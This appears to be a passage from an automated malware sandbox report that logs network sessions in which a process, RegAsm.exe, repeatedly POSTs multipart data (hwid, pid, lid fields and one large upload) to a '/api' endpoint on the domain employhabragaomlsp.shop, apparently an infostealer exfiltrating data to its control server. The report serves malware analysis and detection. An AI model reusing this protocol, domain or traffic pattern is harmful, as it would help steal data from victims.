bc 09 70
                                Data Ascii: -4-g|gYPS{''>hzz]^eg'$py6="R*_~,H'x[.d3x|EOE/HJ+?s~X#g+]CMxEOf=PIaEm`iqm{{Z~HavQjp
                                2024-05-23 22:22:27 UTC15331OUTData Raw: d9 dc c9 b2 fe 20 17 cd ce c4 cf 13 c2 5c b7 2a fb 8b 8b 47 b6 5c 53 c4 53 c4 5f a9 cd 3e 29 66 96 2b ff bb 11 e9 c7 95 e7 e4 d0 18 d6 bf 3a 64 bf 19 74 8c b7 50 6f 79 a0 50 33 87 b1 f6 f5 bb 55 ec 21 3a 0f 35 17 7d ca c1 71 d5 29 fc d0 c6 80 fb 7d c5 7b 9a 8b 4e f2 c9 51 9f 34 5e b6 fc c4 de bc b5 e9 a4 d4 f3 a9 f7 8d 91 3a 3d b8 2f 03 90 eb e0 b5 52 d4 e4 d6 cb 8d 77 63 5a 68 96 c1 6c 27 67 e0 96 ce ba 80 44 5c de 8f 0c 6e 5d f4 27 45 e3 47 70 7d bb bf 83 28 a8 f9 19 dc 77 fa af 3a 0e 7f 86 25 bd 37 5b a4 50 e2 12 3b 7c ad 5d d3 5e 03 18 c1 26 87 85 e3 9e 84 1f 28 5b bc 45 bf c1 07 a0 39 89 03 d6 c4 54 ce 1e 65 d2 c9 b9 45 d5 4d 83 6a 06 f3 c2 88 4c cc 8b a4 d0 a8 51 21 8a d0 89 da 96 15 03 f9 07 8f 62 1a 83 6b 8a b3 fe d2 db 8f f9 8b ef 68 c7 9e 89 d0
                                Data Ascii: \*G\SS_>)f+:dtPoyP3U!:5}q)}{NQ4^:=/RwcZhl'gD\n]'EGp}(w:%7[P;|]^&([E9TeEMjLQ!bkh
                                2024-05-23 22:22:27 UTC15331OUTData Raw: 3b 7e 19 9c 15 2c 3c 79 9e 6e 25 74 4b 2a a7 46 3f 46 2b 26 b1 8a 7e e1 e4 34 f8 e1 0f bd 35 c5 2a 85 c4 22 fe 82 83 cb ff 35 fa 21 a0 f0 2e 7f 61 1e e6 02 06 6c a1 81 81 0f 34 6f 8e 90 65 4e 31 42 a4 5b 55 9f 41 52 3d 5e 2f 7d ab 0e 21 f3 a0 e1 08 8a 7e 74 ee 07 fd 6c 0a a3 21 bc 4f 14 3f f2 d6 d7 58 9f e3 ad d6 55 c1 c1 af e8 1a d8 be f8 dc 31 27 79 55 5c 10 21 f3 f8 a1 89 73 b0 07 be 51 62 28 39 57 08 e1 b2 26 4e 63 59 c0 36 43 7a e9 cc 50 76 31 e0 05 d2 8c 57 62 3c 22 e0 3d fe e8 8b ea ed 95 74 07 aa 89 8c c9 49 fe 72 f0 2c bb e0 32 1a e6 13 50 07 2f 73 6d 26 a0 53 7c d8 b5 27 3f aa 52 47 91 39 d8 bc 58 fc d3 0d 51 7b c6 b1 d4 14 71 bc bf 76 66 05 67 1f 36 b2 44 de 01 ca f4 01 25 5e a2 6f da 84 ee 93 6a 8c 81 21 9d d6 ed 99 f7 a3 89 ab bc ef 65 ad 4d
                                Data Ascii: ;~,<yn%tK*F?F+&~45*"5!.al4oeN1B[UAR=^/}!~tl!O?XU1'yU\!sQb(9W&NcY6CzPv1Wb<"=tIr,2P/sm&S|'?RG9XQ{qvfg6D%^oj!eM
                                2024-05-23 22:22:27 UTC15331OUTData Raw: 78 d5 a0 b5 7f c0 f6 1c bd d4 66 3c 73 63 52 f2 82 b8 be ef 8a ab d7 41 aa d7 ac 92 5c 44 a0 d0 61 52 b3 63 18 79 24 bb d0 66 64 5e 71 bf 68 75 95 e5 d7 4e 63 ff 8b da 93 46 8b ee 5e 3d 0d 46 af 30 d1 a0 b9 88 33 f9 eb 60 9d eb 4d 49 96 88 70 e5 99 24 77 b5 18 d2 8d 51 41 4a 0d 7c 86 f5 20 e2 a6 d8 06 96 dd fa 8b 9e 8c 1d 8f 48 2f 00 63 06 9b fa 72 cd 7a bc ef e5 96 71 81 a7 49 3d 51 21 96 e7 6e 39 ee ba 51 c0 b2 75 cb 30 af 32 de a5 74 8e 26 b9 10 43 4d 65 2e 9f 8c b3 b2 52 ca 50 ee 8b cd 10 13 8b 97 f9 b2 fa b3 3e 87 c9 cb ff 83 74 9e 76 73 16 73 5f 76 52 6f 73 df 39 d6 56 86 d0 27 39 ad 25 f0 24 ae cd 00 3e cb 76 53 65 94 4a 3e 53 48 52 17 e0 ab 09 fb c5 6a f8 47 a4 ca c4 09 57 95 df 4d f0 16 38 e4 cd e9 34 75 4a 94 7a b6 2a 85 a2 ff cb 9c 6b 0d 2c e6
                                Data Ascii: xf<scRA\DaRcy$fd^qhuNcF^=F03`MIp$wQAJ| H/crzqI=Q!n9Qu02t&CMe.RP>tvss_vRos9V'9%$>vSeJ>SHRjGWM84uJz*k,
                                2024-05-23 22:22:27 UTC15331OUTData Raw: 12 39 63 f0 ea 7f 78 c9 d4 9c 62 b4 88 c0 0f 73 7f 94 a6 76 9b 0c fc d5 43 c0 ef 53 6a 20 10 5b fa e5 99 77 67 de 75 35 f5 32 fb d4 99 c1 cc 6b d4 3b 42 15 c0 df 0f dd 7d 9a 6a fe 95 08 7e 97 fb 2e 3d 7a 4c 9d 7d 2b a7 bd 7f 17 11 34 1b 82 b5 7b 32 f0 24 ce 1e 4f 9a f3 d9 d0 92 83 2d 16 37 cd d3 6d 3d b8 3a 7b b3 af 51 23 2b 48 8d ad 67 22 3e 4e 5e de d0 3a 47 8f 86 65 b1 38 b6 c5 86 16 89 7a 82 d5 72 9d d3 d2 9e 79 95 9c b2 21 75 1d 3a 98 10 e5 ee fb 74 db 9c 47 32 31 aa 6a 9b 83 81 9b cf 70 b5 46 b2 5f 93 47 72 e5 19 49 d8 d3 49 7b a4 4c 76 d7 e9 27 48 68 87 e6 07 01 26 6c e4 51 3c 23 00 75 45 06 9f 41 15 20 5c 72 a2 cf 4c 93 c3 df e8 da 39 c1 f3 ba 08 3f 17 b0 83 5e 4a c2 7e b9 12 26 48 39 34 a4 a0 9c 56 ca f5 3b 7c 4f ea c4 b8 87 07 28 fd 47 e4 df 8c
                                Data Ascii: 9cxbsvCSj [wgu52k;B}j~.=zL}+4{2$O-7m=:{Q#+Hg">N^:Ge8zry!u:tG21jpF_GrII{Lv'Hh&lQ<#uEA \rL9?^J~&H94V;|O(G
                                2024-05-23 22:22:27 UTC15331OUTData Raw: 3b f9 0e 39 dc c4 55 87 f6 10 5c 14 22 33 fb 2f 03 9b 4a a7 73 7a f9 cc 77 1b ee 41 f8 7d 2e e3 30 7a 16 1a d5 ff 52 ae 0f 04 e3 71 40 1e 78 80 7d 4d 9b 2f d4 9e 24 59 15 9a f2 da 94 ec db 00 90 83 fb df 07 9c 07 39 bc 73 c6 4e 82 64 df 87 a9 68 ed b1 c0 3e bf 1b 1e c3 25 50 85 5e 7e bd 1a 44 2e 9d fb b5 de 97 17 9b 94 6c 8b 0b 40 f7 b7 b9 ac 8f e1 b2 e2 36 da 44 d7 33 79 f3 0b 75 17 75 ef 4a 30 65 80 c3 8a e1 3f 01 9c 28 86 b7 59 33 92 71 e6 c4 d8 13 9e e1 92 45 cb 01 1d b8 2a cb 66 79 d1 57 1f f3 9c f3 80 dd 1d d9 5b 7c 3b 21 82 d2 30 c4 fa 77 0e b7 da 70 c9 75 16 02 0d 2c 98 19 8e 74 ca bc 7d 37 da 4d 7c be 68 77 79 5b 5b 4a f9 5e ee fa c6 1c af 5b ad 8a 13 42 b1 fd 5e a4 cf 90 71 8c 62 dd cb d6 80 40 d4 32 ab c7 4b 38 4d 2c 74 e2 f1 ef bf 7e 25 6a cd
                                Data Ascii: ;9U\"3/JszwA}.0zRq@x}M/$Y9sNdh>%P^~D.l@6D3yuuJ0e?(Y3qE*fyW[|;!0wpu,t}7M|hwy[[J^[B^qb@2K8M,t~%j
                                2024-05-23 22:22:27 UTC15331OUTData Raw: b7 47 71 f5 22 13 91 09 01 ca 8b f2 9b c3 f5 dc 44 1d 06 b1 82 cd 94 44 31 5b 56 ab 7b 2b 79 e3 22 ef 16 dc e2 e3 cc e1 c4 d9 01 ec 2c a4 8a 90 51 3d 72 33 74 1f 59 85 e4 d6 6e eb 29 56 f8 f8 ef bf e9 75 e8 fc af 2e 47 a8 d2 d8 fd b3 af e6 b5 d0 e0 fd b4 39 1f 20 67 1b 70 4f 53 50 88 b5 67 bf c1 95 6d 19 3e f4 40 f4 79 5b cf 39 b6 8e 94 b7 1e 48 b8 4f 4b f3 e3 8a 06 80 cd 3d 0c e6 5a 7d 24 91 41 64 98 68 ae 33 24 7c 49 0a a2 97 02 bb 0c 51 21 15 c6 08 62 3c 2c 84 28 c9 f2 5d b9 e5 7a 84 16 36 5b 14 52 a3 d9 ba a6 86 7d 57 02 ba 57 bd b2 a2 1d 90 e0 69 40 da 1b b7 1a 9b 4e 7f 65 0f 81 4f 7b 4c 5d b7 49 92 b2 eb 4c d0 b1 3f 57 f2 34 eb 94 05 6e f4 a6 b6 db 38 47 af 36 af c3 9e 22 8d d3 0c 79 70 d2 73 75 fb f8 c8 fb 18 d2 14 37 29 c2 fc 3e c6 89 5a 2a e1 e0
                                Data Ascii: Gq"DD1[V{+y",Q=r3tYn)Vu.G9 gpOSPgm>@y[9HOK=Z}$Adh3$|IQ!b<,(]z6[R}WWi@NeO{L]IL?W4n8G6"ypsu7)>Z*
                                2024-05-23 22:22:27 UTC15331OUTData Raw: bc 5f 98 2a 7c dd ab 39 86 77 83 c0 3d 6d 23 3d 8d 04 df 9c 4f b3 d2 f8 ca 8b da f8 bd 4a c6 9f 3b aa d1 32 50 d2 67 27 0f d8 fc 8e 9c 7c 24 26 32 78 f3 af 79 fe f0 9e 87 f5 09 11 eb 42 56 48 b7 fa 56 c7 d9 6c 98 2d c9 12 46 01 f9 5f a3 f9 37 ac 9d 59 06 47 af b0 44 c0 d3 1d ce bf 92 2f 1e c9 71 16 66 64 da d2 cd 8c 37 f1 6c 71 94 55 95 2b bf ae 53 aa 85 f4 f2 96 b6 91 3d 45 b5 27 14 1f 0a 36 9e 20 3d d4 26 95 6b 54 21 c8 5b f1 b5 fb a3 a7 ba 36 23 74 75 c1 27 d1 63 8f ff fb 98 2c 19 4b e4 29 2b 26 6a 8a 37 28 d2 1b ca 56 8a 96 bf 63 65 e6 3c 2b aa 2f fc f0 0e af 9f c9 5c 60 6f 70 ed 63 3e 19 8c 86 cd b5 94 87 13 bd fe 66 6e 8c 96 b0 83 03 47 7d e7 28 03 16 7f d6 36 b9 4e f9 16 bb 4c 3a 28 ac 6c 2c 3e 41 8c b9 46 c0 c5 1c 4a 78 3d 6e 7e fc 7d 62 01 e7 17
                                Data Ascii: _*|9w=m#=OJ;2Pg'|$&2xyBVHVl-F_7YGD/qfd7lqU+S=E'6 =&kT![6#tu'c,K)+&j7(Vce<+/\`opc>fnG}(6NL:(l,>AFJx=n~}b
                                2024-05-23 22:22:30 UTC814INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:30 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=20ek19g1ttd6knc53vetsd8b45; expires=Mon, 16-Sep-2024 16:09:08 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Xl0v3Nt6WUkk5Xsf2Dqmm7olYJZdVyuRs%2BmKDZARc%2B7f93kyRaGTYB7PMzfy2esznsY0wzrK3ODaX6OsN9V9Yuuxq6pFMeJF35cZsxQS2XfW%2Bojae3c6yiDCsT3%2FyJbFYvQ2eh8bFTDuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871df7ce4c452-EWR
                                alt-svc: h3=":443"; ma=86400


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                33192.168.2.649754188.114.96.34433160C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:28 UTC289OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 19958
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:28 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:28 UTC4627OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5
                                Data Ascii: +?2+?2+?o?Mp5p_
                                2024-05-23 22:22:28 UTC810INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:28 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=10mhqcauvc49q90fforvstb3od; expires=Mon, 16-Sep-2024 16:09:07 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0yvPmf4LuFQsJl1GOcESigL82CPu0wGIDbERYyU1eIwcOR%2BGrYmjfmgoZsgkfI6kiXu3R75od71owiVesCjbIqM1AwzZwDnECBagGyr2GUlp%2BwybSB9g7ogxmpPlQTHBJTdIkwHhf0JGmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871e17b5fc328-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                34192.168.2.649755188.114.96.34433160C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:29 UTC288OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 5429
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:29 UTC5429OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:30 UTC824INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:30 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=t0oekdpv1t0uvnv669ga3a4oiq; expires=Mon, 16-Sep-2024 16:09:08 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qga3FGf1zJDN6b017Ccx%2BJulL%2FKFoDQdA1aZpyEjTUALRbSgrmczldOcLJu6zCP%2BeWaTLNH29nVOgfXr%2FGlWGC3YoajqI2kyY8lK3DMNIqWm4ZM%2B%2BUajfX%2Fa2MeZLj7t4Jh5QiLcD%2Ft2%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871ea9de6c35e-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                35192.168.2.649756188.114.96.34433160C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:31 UTC288OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 1234
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:31 UTC1234OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:31 UTC820INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:31 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=3r7bjm8dbkum3jdb5oo9caua9c; expires=Mon, 16-Sep-2024 16:09:10 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tYXuGUR8P7qrciXGJs%2F%2FTNOXoPRwYEbp%2Fp25h1z9i4YKYJX78HYXC5HmQ1A1nUr3rRzthrvymUhfYPff%2Fj%2FDkk%2FX7kOxigAZ%2Fn1WC38JA2IWkIkfx9Nr7IZH26twRytDmXlfyzoJ6m4jjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871f4e9e54286-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                36192.168.2.649757188.114.96.34433160C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:32 UTC290OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 572276
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:32 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:32 UTC15331OUTData Raw: 77 b4 22 d5 56 b8 2f 56 83 cb 31 d7 50 ef 5c 7e 74 c7 77 fa 4f 49 97 d7 0a 1a 91 3e b0 a7 07 a2 7e db 38 1d ab 3c 98 9d 90 a0 b2 b7 9e b5 a8 17 76 3a f2 e1 ec a1 36 4d 08 3d ef f3 4e 05 2a 6f f2 8a 85 5c 50 a2 8b d4 12 04 95 cd e6 2a 15 00 be e2 66 93 f5 e2 a3 c3 93 ea 3c cc 2c 73 e9 97 2a fe 50 7a d9 de f0 ac e7 a2 a9 44 a6 20 82 ba e1 22 fc eb 65 98 23 58 ae be 79 6e f8 67 07 2b e3 15 7d 76 95 17 ec 26 01 aa 67 24 58 e6 5b cc c2 5a e0 b6 ac e7 53 57 d3 e3 6f ca c8 dc eb 4d 6b 67 ad 21 04 ab ae d7 0f be 5c b1 47 50 95 2d fe bf 87 31 7b b1 30 32 18 43 d6 66 4f 03 88 7b d5 6c 3e ec 0a 2c 11 6d 72 f3 2a 66 78 3a 8e 55 61 ae 2e 4b b5 9f 19 ca bb 85 cf 67 68 e7 4d 75 5b 80 7c 1c a6 17 09 f7 fe 76 ea 9b 85 a8 af c7 02 54 33 65 a3 f7 65 d8 96 61 24 db 42 49 fb
                                Data Ascii: w"V/V1P\~twOI>~8<v:6M=N*o\P*f<,s*PzD "e#Xyng+}v&g$X[ZSWoMkg!\GP-1{02CfO{l>,mr*fx:Ua.KghMu[|vT3eea$BI
                                2024-05-23 22:22:32 UTC15331OUTData Raw: ef 2d e3 e6 34 2d a4 67 7c 67 fc a7 9a 59 50 c4 53 c7 e6 07 80 7b ee 27 ab eb 27 af 81 3e 1a fe f3 98 b7 f2 98 68 7a 8c e6 8e eb af be 7a 5d f4 a3 5e 65 67 27 8c 95 ba cc 10 c5 f1 8c f4 e3 b5 93 c7 24 91 70 10 df d8 95 cb c7 fe 79 16 fa 36 3d d7 b9 c9 fe 22 ca 52 2a 04 dc a7 dc 5f 7e 2c 9d e5 f4 48 0f c7 27 a6 78 88 bb 5b 0c 2e a1 19 86 12 a0 64 b7 c9 9e c0 33 78 7c c2 85 a5 a1 7f e2 45 4f 15 45 ee 2f 48 f2 80 e1 4a dd 17 e5 2b 82 3f 06 fa 73 eb f5 87 7e 58 0b d2 8b 23 a5 85 85 67 2b 5d 43 4d 78 45 df a3 09 4f 9b e0 86 e2 b1 66 9c d2 b8 3d 08 fc a0 c1 97 f0 8e 10 11 f6 c2 50 49 81 61 d6 19 e5 45 d5 6d a9 60 e5 1c ff f3 69 17 71 6d a8 c7 fa c4 ec bd 7b 7b 5a 7e f3 48 af 61 1e be bd 76 dd dd e5 86 c5 d7 51 d2 f7 6a b7 17 96 86 0b f7 1d 0a 10 d5 c8 bc 09 70
                                Data Ascii: -4-g|gYPS{''>hzz]^eg'$py6="R*_~,H'x[.d3x|EOE/HJ+?s~X#g+]CMxEOf=PIaEm`iqm{{Z~HavQjp
